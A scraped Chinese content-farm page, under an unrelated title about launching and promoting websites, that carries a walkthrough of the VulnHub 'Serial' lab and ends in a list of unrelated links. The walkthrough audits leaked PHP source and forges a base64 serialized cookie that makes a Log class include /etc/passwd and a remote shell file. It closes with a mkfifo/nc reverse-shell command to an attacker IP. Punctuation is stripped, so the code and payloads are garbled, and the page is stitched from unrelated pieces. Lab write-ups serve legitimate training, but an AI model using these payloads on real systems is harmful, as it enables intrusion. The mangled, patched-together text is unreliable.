当前位置: 首页 > news >正文

网站怎样上线有网站怎样做推广

网站怎样上线,有网站怎样做推广,做网站有什么书,刚做的win7系统连上网站没网这次我们来做这个靶场 项目地址https://download.vulnhub.com/serial/serial.zip 使用vm新建虚拟机 以下为注意事项 第一步#xff0c;收集资产 扫描靶场ip netdiscover -i eth0 -r 192.168.177.0/24 抓个包 扫描目录 看到了cookie中有一个user Tzo0OiJVc2VyIjoyOntzOj… 这次我们来做这个靶场 项目地址https://download.vulnhub.com/serial/serial.zip 使用vm新建虚拟机 以下为注意事项 第一步收集资产 扫描靶场ip netdiscover -i eth0 -r 192.168.177.0/24 抓个包 扫描目录 看到了cookie中有一个user Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D 去问问ai这是像是编码 O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}} 看不懂算了爆破目录吧 dirsearch一下 下载他的备份发现三个文件看一看 这是每个php文件并使用ai加了注释 index.php ?php// 引入用户类文件 user.class.phpinclude(user.class.php);// 如果 $_COOKIE[user] 未设置if(!isset($_COOKIE[user])) {// 设置 cookie使用 base64 编码和序列化后的用户对象setcookie(user, base64_encode(serialize(new User(sk4))));} else {// 如果 $_COOKIE[user] 已设置则尝试反序列化并解码unserialize(base64_decode($_COOKIE[user]));}// 输出一条消息说明这是一个新 cookie 处理器的测试版echo This is a beta test for new cookie handler\n; ?log.class.php ?phpclass Log {private $type_log; // 私有属性用于存储日志类型的文件路径或句柄function __costruct($hnd) { // 构造函数接受一个参数用于设置日志类型$this-$type_log $hnd; // 将传入的日志类型参数赋值给类的属性 $type_log}public function handler($val) { // 公共方法用于处理日志include($this-type_log); // 动态包含类属性 $type_log 指定的文件echo LOG: . $val; // 输出日志信息格式为 LOG: 后跟 $val 的值}} ?user.class.php ?phpinclude(log.class.php); // 引入日志类文件 log.class.phpclass Welcome {public function handler($val) {echo Hello . $val; // 输出欢迎信息格式为 Hello 后跟参数 $val 的值}}class User {private $name; // 私有属性用于存储用户名private $wel; // 私有属性用于存储 Welcome 类的实例对象function __construct($name) { // 构造函数接受一个参数 $name 用于设置用户名$this-name $name; // 将传入的 $name 参数赋值给类的属性 $name$this-wel new Welcome(); // 创建 Welcome 类的实例对象并赋值给属性 $wel}function __destruct() { // 析构函数在对象销毁时自动调用//echo bye\n; // 注释掉的代码本意是在对象销毁时输出 bye$this-wel-handler($this-name); // 调用 Welcome 类的 handler 方法向其传递当前对象的用户名参数 $this-name}}?审计完成代码我们对抓包内容进行更改 O:4:User:2:{s:10:Username;s:5:admin;s:9:Userwel;O:3:Log:1:{s:8:type_log;s:11:/etc/passwd;}} 加码 Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ 构造语句 O:4:User:2:{s:10:\x00User\x00name;s:5:admin;s:9:\x00User\x00wel;O:3:Log:1:{s:8:type_log;s:25:http://192.168.3.237/shell.txt;}} /?cmdrmtmp/f%3bmkfifo/tmp/f%3bcat/tmpf|/bin/sh-i2%261|nc192.168.177.1424444/tmp/f 网上找的攻击语句
http://www.w-s-a.com/news/690446/

相关文章:

  • 大型网站建设哪家好汉川网页设计
  • 深圳品牌策划公司推荐南昌网站怎么做seo
  • 滨州做微商城网站备案时暂时关闭网站
  • 手机网站样式代码网站是怎样制作的
  • 任务发布网站建设苏州园区房价
  • 网站的认识知识付费做的最好的平台
  • 企业电子商务网站设计的原则深圳的网站建设公司怎么样
  • 个人网站趋向wordpress图片搬家
  • 做空压机网站的公司有哪些wordpress 外部链接
  • 网站建设管理成本估计小红书推广平台
  • 一级a做爰片免费观看网站焦作建设企业网站公司
  • 欧阳网站建设2022华为云营销季
  • 快速学做网站高水平的大连网站建设
  • 专业做房地产网站建设wordpress侧面小工具
  • 旅游网站开发的重要性wordpress添加广告插件
  • 关于网站建设管理工作的报告婚纱网站php
  • 东莞市建设培训中心网站那个网站可以看高速的建设情况
  • 网站开发工具安卓版专业小程序商城开发
  • 网站不备案影响收录吗深圳住房网站app
  • 交网站建设域名计入什么科目开发平台教程
  • 个人网站定制北京快速建站模板
  • 河南海华工程建设监理公司网站高端论坛网站建设
  • 网站建设网络推广方案图片编辑器免费
  • 如何用dw做网站设计设计头条
  • 网站建设基础及流程北京商场购物中心排名
  • 青州市城乡建设局网站自建网站步骤
  • wordpress文章延迟加载优化设计答案四年级上册语文
  • 做网站源码要给客户嘛怎么在运行打开wordpress
  • 北海住房和城乡建设局网站wordpress标题去掉私密
  • 织梦网站安装视频做网站都有那些步骤